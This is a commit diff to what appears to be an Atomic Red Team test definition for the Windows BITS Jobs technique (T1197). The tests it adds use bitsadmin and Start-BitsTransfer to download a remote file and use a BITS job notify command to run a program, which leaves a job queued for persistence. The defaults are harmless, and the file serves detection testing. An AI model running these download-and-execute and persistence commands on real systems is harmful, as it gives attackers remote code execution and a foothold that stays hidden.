Added test for persistence via BITS (#409)

2018-12-04 18:38:19 -06:00
parent 4c0eab68c4
commit 9a487bd26a
1 changed files with 55 additions and 2 deletions
@@ -10,17 +10,70 @@ atomic_tests:

  supported_platforms:
    - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
  executor:
    name: command_prompt
    command: |
-      bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1
+      bitsadmin.exe  /transfer /Download /priority Foreground #{remote_file} #{local_file}
 - name: Download & Execute via PowerShell BITS
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload leveraging PowerShell
  supported_platforms:
    - windows
+  input_arguments:
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
  executor:
    name: powershell
    command: |
-      Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
+      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
+
+- name: Persist, Download, & Execute
+  description: |
+    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer 
+    and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
+  supported_platforms:
+    - windows
+  input_arguments:
+    bits_job_name:
+      description: Name of BITS job
+      type: string
+      default: AtomicBITS
+    remote_file:
+      description: Remote file to download
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+    local_file:
+      description: Local file path to save downloaded file
+      type: path
+      default: C:\Windows\Temp\bitsadmin_flag.ps1
+    command_path:
+      description: Path of command to execute
+      type: path
+      default: C:\Windows\system32\notepad.exe
+    command_line:
+      description: Command line to execute
+      type: string
+      default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1
+  executor:
+    name: command_prompt
+    command: |
+      bitsadmin.exe /create #{bits_job_name}
+      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
+      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
+      bitsadmin.exe /resume #{bits_job_name}